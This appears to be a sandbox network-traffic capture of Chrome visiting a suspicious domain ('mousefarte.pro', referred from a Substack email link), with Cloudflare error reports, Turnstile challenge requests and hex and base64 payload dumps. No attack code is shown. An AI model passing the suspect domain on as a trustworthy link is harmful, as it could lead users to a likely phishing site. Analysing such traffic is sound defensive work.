                                                                                        Data Ascii: m76AksSmi6iov7vHsYmSp82T09bG05e828up17Gs2dm4wNXW5KnC5+XI2cq7usDk8PCx5O3n6e7Q/fzNvsD+utj28MC71snD9ekRzwHyAOAG9vHpCxH42QjV2wLwCyPjHvb+HAYo5iUXAwMl7h0HKfPsDwP4NikmBh4Q+goiP/o0F0P+N0AqSEYdHUE7DFQlPkciD0syTi1SN1xYUE09Lj0yWhtBbGskRDpbRmpqZXVCaFgvVnZzTXBUXV98P3Z
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 5a 36 47 75 65 34 71 49 73 61 43 34 69 61 6d 4c 74 49 2b 34 6d 70 4f 63 6a 33 32 61 6c 49 53 77 66 6e 2b 6a 74 5a 71 64 6e 72 69 64 72 35 2f 4f 76 72 57 77 7a 4d 75 32 75 4e 79 38 30 71 37 59 6e 73 48 54 74 71 53 62 77 4d 4f 61 35 65 4b 71 31 36 33 6e 78 65 6a 47 79 75 43 2f 79 74 44 47 35 50 72 51 32 4e 48 57 74 75 2f 79 2f 50 72 63 37 76 72 43 32 39 7a 78 39 51 66 6d 79 41 72 6c 35 4d 6a 45 33 67 54 32 42 74 41 46 42 77 66 56 38 4e 6f 56 48 42 6e 36 44 69 4d 53 49 2f 50 38 33 76 48 70 4b 2b 58 36 4c 4f 72 6e 47 69 38 45 37 79 41 41 4b 54 67 37 43 78 51 54 39 42 49 75 4d 68 49 37 4f 54 51 61 51 6b 45 33 4f 54 30 49 47 45 49 4a 4a 55 77 50 44 43 6f 70 4d 44 42 47 4c 6a 6b 6d 4e 43 59 6e 45 53 6f 35 54 54 34 73 51 6d 59 5a 52 79 41 39 54 45 46 4d 58 46 31
                                                                                        Data Ascii: Z6Gue4qIsaC4iamLtI+4mpOcj32alISwfn+jtZqdnridr5/OvrWwzMu2uNy80q7YnsHTtqSbwMOa5eKq163nxejGyuC/ytDG5PrQ2NHWtu/y/Prc7vrC29zx9QfmyArl5MjE3gT2BtAFBwfV8NoVHBn6DiMSI/P83vHpK+X6LOrnGi8E7yAAKTg7CxQT9BIuMhI7OTQaQkE3OT0IGEIJJUwPDCopMDBGLjkmNCYnESo5TT4sQmYZRyA9TEFMXF1
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 71 4b 76 6c 35 71 76 70 4a 75 71 74 72 5a 7a 6c 61 32 6b 6c 58 79 50 6b 70 75 48 66 61 75 36 69 63 54 46 75 6f 76 49 30 73 6d 71 72 4b 75 68 31 74 50 4c 6e 4e 36 35 6e 4c 33 4b 79 39 37 6a 6e 4b 54 51 6f 71 43 37 34 64 76 4c 7a 63 4f 78 34 38 4c 70 31 64 66 51 7a 65 75 30 75 4f 2f 59 2b 64 2f 56 7a 74 54 34 7a 64 43 34 41 4f 58 6d 34 64 55 47 31 73 73 48 79 77 4c 65 45 74 44 79 34 4f 72 59 38 74 6a 54 37 64 6e 6e 49 66 41 4b 46 64 34 44 2b 67 67 48 39 77 49 54 43 2f 6b 70 48 78 6e 70 38 51 63 6b 45 69 6f 48 45 69 55 56 4c 50 55 72 4f 6a 51 62 2f 41 6f 74 50 67 30 54 48 76 34 58 4d 69 45 58 52 54 73 2b 4d 53 52 53 53 53 56 4f 4b 54 59 56 55 44 42 57 4d 46 45 75 4b 30 39 66 4c 68 74 42 4e 69 41 6c 58 47 49 2b 50 32 51 2f 59 45 68 64 4d 55 74 63 58 46 34 7a
                                                                                        Data Ascii: qKvl5qvpJuqtrZzla2klXyPkpuHfau6icTFuovI0smqrKuh1tPLnN65nL3Ky97jnKTQoqC74dvLzcOx48Lp1dfQzeu0uO/Y+d/VztT4zdC4AOXm4dUG1ssHywLeEtDy4OrY8tjT7dnnIfAKFd4D+ggH9wITC/kpHxnp8QckEioHEiUVLPUrOjQb/AotPg0THv4XMiEXRTs+MSRSSSVOKTYVUDBWMFEuK09fLhtBNiAlXGI+P2Q/YEhdMUtcXF4z
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 57 65 73 4a 4f 36 71 73 4f 77 70 73 44 44 74 4c 47 41 74 37 7a 44 6f 35 2f 52 6f 63 71 76 30 4d 61 6c 6b 71 71 51 75 71 2b 33 71 62 36 7a 34 4a 6a 65 73 4f 50 62 6e 62 72 42 33 39 7a 49 33 4d 58 4f 76 50 43 6f 32 73 44 30 73 4f 62 4b 30 65 2f 61 79 50 72 75 36 72 48 57 2b 2f 66 77 74 74 50 76 36 4e 58 43 36 4d 51 49 32 38 41 4c 33 4d 50 4c 46 65 50 52 42 75 6b 52 46 67 66 6f 37 52 50 76 32 64 77 59 39 74 55 56 2f 66 48 6e 48 76 33 35 34 69 30 65 36 4f 2f 6f 4c 50 45 4a 48 53 49 69 4d 77 4d 51 43 53 67 49 45 68 73 4f 48 6b 4d 32 2f 50 5a 48 47 77 4c 36 49 54 51 48 4f 55 74 4a 43 44 30 6f 42 56 4a 47 49 43 52 50 47 51 77 70 58 43 39 4a 4d 79 38 66 57 56 6c 69 56 46 63 36 4d 57 45 38 57 45 55 73 56 31 70 6b 58 6a 46 7a 53 47 52 53 64 31 4e 79 55 54 70 49 53
                                                                                        Data Ascii: WesJO6qsOwpsDDtLGAt7zDo5/Rocqv0MalkqqQuq+3qb6z4JjesOPbnbrB39zI3MXOvPCo2sD0sObK0e/ayPru6rHW+/fwttPv6NXC6MQI28AL3MPLFePRBukRFgfo7RPv2dwY9tUV/fHnHv354i0e6O/oLPEJHSIiMwMQCSgIEhsOHkM2/PZHGwL6ITQHOUtJCD0oBVJGICRPGQwpXC9JMy8fWVliVFc6MWE8WEUsV1pkXjFzSGRSd1NyUTpIS
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 39 78 6f 4f 51 68 34 43 41 74 35 75 4c 68 71 72 4b 79 36 61 66 79 4d 53 66 79 37 57 35 72 35 6a 58 76 74 47 35 32 70 66 4e 31 35 37 53 6f 38 2f 45 31 36 4c 65 71 75 4c 4f 36 2b 72 45 72 4b 6e 74 79 75 69 2f 31 4e 4c 47 35 4d 61 31 74 50 44 6f 37 64 4c 31 37 2f 58 30 76 2f 54 71 31 38 66 46 37 4f 6a 50 2f 67 45 49 33 66 33 4c 46 67 51 51 34 52 6e 4e 36 4f 76 65 47 78 72 54 33 53 4d 50 38 78 77 66 48 65 54 36 39 69 33 36 41 51 6a 2b 2b 53 6b 7a 37 77 38 51 44 67 38 71 2b 42 49 61 48 54 48 32 4f 42 77 2f 47 52 77 36 50 42 41 69 49 43 76 39 47 42 64 4c 43 7a 30 51 52 42 49 48 52 30 67 55 56 69 31 51 48 44 4d 61 46 52 67 34 4b 32 46 68 57 78 39 46 49 30 63 7a 56 56 52 4c 50 6a 78 71 5a 7a 46 4d 52 58 42 57 5a 6b 64 43 4f 6c 4e 58 54 7a 63 2b 64 46 4d 30 64 34
                                                                                        Data Ascii: 9xoOQh4CAt5uLhqrKy6afyMSfy7W5r5jXvtG52pfN157So8/E16LequLO6+rErKntyui/1NLG5Ma1tPDo7dL17/X0v/Tq18fF7OjP/gEI3f3LFgQQ4RnN6OveGxrT3SMP8xwfHeT69i36AQj++Skz7w8QDg8q+BIaHTH2OBw/GRw6PBAiICv9GBdLCz0QRBIHR0gUVi1QHDMaFRg4K2FhWx9FI0czVVRLPjxqZzFMRXBWZkdCOlNXTzc+dFM0d4
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 6c 38 76 49 75 6f 72 4c 78 73 53 4d 68 73 37 43 79 4b 79 34 74 73 50 48 6e 4e 33 4f 73 62 54 59 31 4c 50 43 32 63 54 47 30 65 71 68 35 63 79 39 33 4d 66 76 37 64 36 77 79 65 33 6b 79 2f 71 78 39 66 75 38 2f 73 2f 4b 41 50 4c 53 42 73 30 48 42 4d 6a 32 34 2f 33 6c 34 65 44 59 35 38 2f 4d 35 4f 73 41 33 75 50 52 36 2b 55 56 48 4e 55 57 44 78 6f 44 31 4f 73 54 34 2f 4d 6a 48 51 44 36 48 77 6b 44 4b 41 49 71 44 43 59 70 42 2b 34 77 4c 78 6f 79 4e 6a 62 36 46 77 73 58 4e 55 41 39 50 44 34 63 4b 44 73 46 42 67 64 42 52 43 78 48 54 46 4a 52 53 51 78 4f 4b 55 68 53 43 31 56 51 4a 55 63 62 48 7a 73 63 51 45 39 4e 56 6b 59 78 57 43 4e 71 4e 31 6c 4e 57 57 70 72 58 6b 68 30 53 45 39 30 5a 30 68 43 56 6b 56 4a 56 6a 6c 2b 57 55 35 50 62 6b 4a 42 67 6f 46 43 57 32 4a
                                                                                        Data Ascii: l8vIuorLxsSMhs7CyKy4tsPHnN3OsbTY1LPC2cTG0eqh5cy93Mfv7d6wye3ky/qx9fu8/s/KAPLSBs0HBMj24/3l4eDY58/M5OsA3uPR6+UVHNUWDxoD1OsT4/MjHQD6HwkDKAIqDCYpB+4wLxoyNjb6FwsXNUA9PD4cKDsFBgdBRCxHTFJRSQxOKUhSC1VQJUcbHzscQE9NVkYxWCNqN1lNWWprXkh0SE90Z0hCVkVJVjl+WU5PbkJBgoFCW2J
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 73 72 47 30 36 61 54 72 62 54 4f 30 4a 69 6b 32 72 6d 63 32 39 4b 38 30 39 4b 38 78 37 44 42 71 63 6d 6a 32 4f 69 2f 78 4b 4b 6f 73 64 37 74 30 50 44 66 73 76 58 34 37 65 62 65 30 4e 71 33 2f 4e 33 54 39 74 6f 45 77 77 48 45 36 74 30 44 35 51 4c 72 37 51 77 41 41 41 33 4f 36 41 34 46 2b 4f 37 6b 39 68 6f 59 32 4f 6e 38 34 68 33 75 2f 67 49 41 35 4f 54 2b 38 77 73 68 43 7a 45 73 4d 69 55 47 49 41 77 34 4a 43 4d 47 39 78 63 64 4b 66 6f 55 2b 69 6f 58 4f 55 41 6e 52 7a 63 71 4b 77 6c 49 54 6b 45 62 4b 6b 4e 42 4b 44 78 48 44 69 55 75 4d 31 6c 53 4d 55 63 6e 47 6b 6c 56 50 54 56 44 49 52 67 30 48 30 64 5a 4e 6b 6f 35 4a 43 30 39 61 57 35 41 50 56 42 76 56 54 56 36 4f 45 6c 48 61 6a 77 38 4f 46 77 34 59 6f 46 38 59 47 56 43 66 58 5a 67 52 58 68 6b 59 6c 70 48
                                                                                        Data Ascii: srG06aTrbTO0Jik2rmc29K809K8x7DBqcmj2Oi/xKKosd7t0PDfsvX47ebe0Nq3/N3T9toEwwHE6t0D5QLr7QwAAA3O6A4F+O7k9hoY2On84h3u/gIA5OT+8wshCzEsMiUGIAw4JCMG9xcdKfoU+ioXOUAnRzcqKwlITkEbKkNBKDxHDiUuM1lSMUcnGklVPTVDIRg0H0dZNko5JC09aW5APVBvVTV6OElHajw8OFw4YoF8YGVCfXZgRXhkYlpH
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 4f 32 71 70 72 50 73 37 53 77 77 4e 57 5a 72 72 62 51 7a 75 57 67 6f 63 4b 6e 33 75 72 4d 79 61 4b 2f 73 64 7a 47 34 75 54 6e 78 39 54 61 30 63 58 49 2f 50 7a 2b 77 41 4c 39 30 2b 58 54 32 51 48 79 77 67 49 44 43 2b 50 35 37 64 34 4c 38 67 63 42 44 63 33 7a 47 42 48 35 39 75 2f 76 2f 65 34 57 48 78 6e 63 47 53 45 63 46 50 45 48 48 79 6a 37 4c 52 48 6f 47 67 4c 7a 44 43 50 78 45 79 48 78 37 42 4d 78 45 53 73 2f 49 41 38 61 2b 69 4d 66 4e 79 4d 52 41 30 63 33 43 53 68 4d 53 43 52 46 45 56 4d 30 53 79 4e 42 4a 30 56 44 4d 45 73 33 56 45 39 66 57 78 35 6a 4d 55 52 43 56 53 52 72 61 79 63 6b 51 45 35 4f 53 45 74 55 64 46 39 68 51 6a 5a 72 59 30 68 6c 4e 58 4e 67 57 56 46 4e 51 33 42 37 52 6a 31 42 51 6d 6d 41 61 47 4b 4e 62 6d 46 4c 66 47 39 4c 5a 5a 52 78 69
                                                                                        Data Ascii: O2qprPs7SwwNWZrrbQzuWgocKn3urMyaK/sdzG4uTnx9Ta0cXI/Pz+wAL90+XT2QHywgIDC+P57d4L8gcBDc3zGBH59u/v/e4WHxncGSEcFPEHHyj7LRHoGgLzDCPxEyHx7BMxESs/IA8a+iMfNyMRA0c3CShMSCRFEVM0SyNBJ0VDMEs3VE9fWx5jMURCVSRrayckQE5OSEtUdF9hQjZrY0hlNXNgWVFNQ3B7Rj1BQmmAaGKNbmFLfG9LZZRxi
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 30 32 4b 32 62 6f 38 48 46 78 38 48 46 71 4e 4c 63 75 2b 58 67 33 61 72 61 38 2b 75 76 37 4c 44 45 37 66 6d 7a 32 72 6e 35 38 4c 61 38 37 41 50 4f 30 62 33 35 2b 4f 6b 48 39 75 73 41 41 51 48 74 79 51 6e 2b 33 75 44 7a 38 64 50 4f 36 2b 37 56 43 66 6e 7a 39 64 77 6a 49 4f 4d 55 2b 78 4c 78 2f 69 50 79 47 65 4c 6e 36 66 6a 34 37 2b 76 70 4d 69 41 4d 49 54 6a 79 44 69 6f 74 2b 67 34 33 50 54 6b 37 49 69 4d 31 51 53 55 43 4f 52 73 31 42 6a 31 4e 4f 42 38 4b 4d 6b 45 78 4d 30 67 6c 55 44 68 4e 56 69 34 58 51 46 5a 42 58 30 73 76 50 43 35 52 57 55 5a 71 53 56 39 42 58 54 64 49 54 46 4e 45 55 47 78 79 4e 44 64 68 4d 54 4a 4e 66 44 56 74 55 30 74 42 59 6d 46 36 54 6e 39 61 59 34 43 4d 57 58 69 48 66 6d 71 4d 54 30 70 2f 6a 6e 4e 6d 62 32 53 4e 6a 58 4e 34 69 46
                                                                                        Data Ascii: 02K2bo8HFx8HFqNLcu+Xg3ara8+uv7LDE7fmz2rn58La87APO0b35+OkH9usAAQHtyQn+3uDz8dPO6+7VCfnz9dwjIOMU+xLx/iPyGeLn6fj47+vpMiAMITjyDiot+g43PTk7IiM1QSUCORs1Bj1NOB8KMkExM0glUDhNVi4XQFZBX0svPC5RWUZqSV9BXTdITFNEUGxyNDdhMTJNfDVtU0tBYmF6Tn9aY4CMWXiHfmqMT0p/jnNmb2SNjXN4iF


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.44975935.190.80.14433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:21 UTC539OUTOPTIONS /report/v4?s=I91XYQS%2FYUjETIAuGW4A9K1gWNIznWjLHDgSQHkw4%2BBjcfQxs1PW4sq6WzAZFsNUA7wHXZn2s%2Bz8wBk7kzRXb4Vwe4wOTEW%2FgOrN8UCYZAmM9imFNHIkerVnhCG9U0fMvw%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://mousefarte.pro
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:21 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-length, content-type
                                                                                        date: Wed, 02 Oct 2024 15:15:21 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.44976135.190.80.14433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:21 UTC482OUTPOST /report/v4?s=I91XYQS%2FYUjETIAuGW4A9K1gWNIznWjLHDgSQHkw4%2BBjcfQxs1PW4sq6WzAZFsNUA7wHXZn2s%2Bz8wBk7kzRXb4Vwe4wOTEW%2FgOrN8UCYZAmM9imFNHIkerVnhCG9U0fMvw%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 460
                                                                                        Content-Type: application/reports+json
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:21 UTC460OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 35 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 75 73 65 66 61 72 74 65 2e 70 72 6f 2f 34 70 41 74 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 73 75 62 73 74 61 63 6b 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74
                                                                                        Data Ascii: [{"age":1,"body":{"elapsed_time":859,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"ht
                                                                                        2024-10-02 15:15:22 UTC168INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        date: Wed, 02 Oct 2024 15:15:21 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.449764104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:23 UTC485OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:23 UTC349INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 15:15:23 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: oeO3bVljpBqXHdkDXZk9xMPQwVOTr6JUuVM=$7oenHSL1F5KLh5L5
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5c8fdf30cbe-EWR
                                                                                        2024-10-02 15:15:23 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.449766104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:24 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc5a5a47e0643e9/1727882120479/XRkbRnieRFP1t3h HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:24 UTC170INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:24 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5ce5ff4de97-EWR
                                                                                        2024-10-02 15:15:24 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5c 00 00 00 23 08 02 00 00 00 96 f9 fa 1b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDR\#IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.449767104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:25 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cc5a5a47e0643e9/1727882120481/a8b23fbbbed7aafb8eb8f06a907e5c7c0eb514aead0ab533f1c0e3be569a2a1d/e77zs-l3pybZIXP HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:25 UTC143INHTTP/1.1 401 Unauthorized
                                                                                        Date: Wed, 02 Oct 2024 15:15:25 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 1
                                                                                        Connection: close
                                                                                        2024-10-02 15:15:25 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 71 4c 49 5f 75 37 37 58 71 76 75 4f 75 50 42 71 6b 48 35 63 66 41 36 31 46 4b 36 74 43 72 55 7a 38 63 44 6a 76 6c 61 61 4b 68 30 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gqLI_u77XqvuOuPBqkH5cfA61FK6tCrUz8cDjvlaaKh0AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                        2024-10-02 15:15:25 UTC1INData Raw: 4a
                                                                                        Data Ascii: J


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.449769104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:26 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc5a5a47e0643e9/1727882120479/XRkbRnieRFP1t3h HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:26 UTC170INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:26 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5dcaa15729f-EWR
                                                                                        2024-10-02 15:15:26 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5c 00 00 00 23 08 02 00 00 00 96 f9 fa 1b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDR\#IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.449770104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:27 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 32010
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: ede8e2645a67d81
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
